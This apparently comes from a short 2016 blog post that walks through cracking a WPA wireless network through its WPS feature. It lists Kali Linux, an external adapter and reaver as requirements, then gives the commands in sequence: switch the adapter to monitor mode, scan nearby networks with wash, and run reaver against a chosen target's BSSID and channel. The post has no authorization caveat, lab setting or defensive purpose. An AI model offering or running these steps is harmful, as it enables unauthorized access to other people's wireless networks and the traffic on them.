Wifi Hacking | WPA (WPS)

by February 16, 2016 0 Comments

Wifi Hacking / WPA (WPS)

You need :

external wifi adapter or dual boot

kali linux vm (not needed if you have the dual boot)

reaver (won't teach you how to console > apt-get install reaver)
airmon-ng : to find your network adapter name - you need an external adapter if you run Kali linux in a VM, you can use internal a long as it is compatible with the monitor mode & that you have Kali in dual boot.

ifconfig (*your adapter name*) down :  disable the adapter

iwconfig (*your adapter name*) mode monitor : change the mode of the adapter to monitor

ifconfig (*your adapter name*) up : re-enable the adapter

wash -i (*your adapter name*) :  will begin to monitor the network nearby - CTRL + C when you found your target.

reaver -i (*your adapter name*) -b (*bssid of the network to attack*) -c (*the channel of the network*) -vv : will begin the crack of the precised wifi

Cyber Hack


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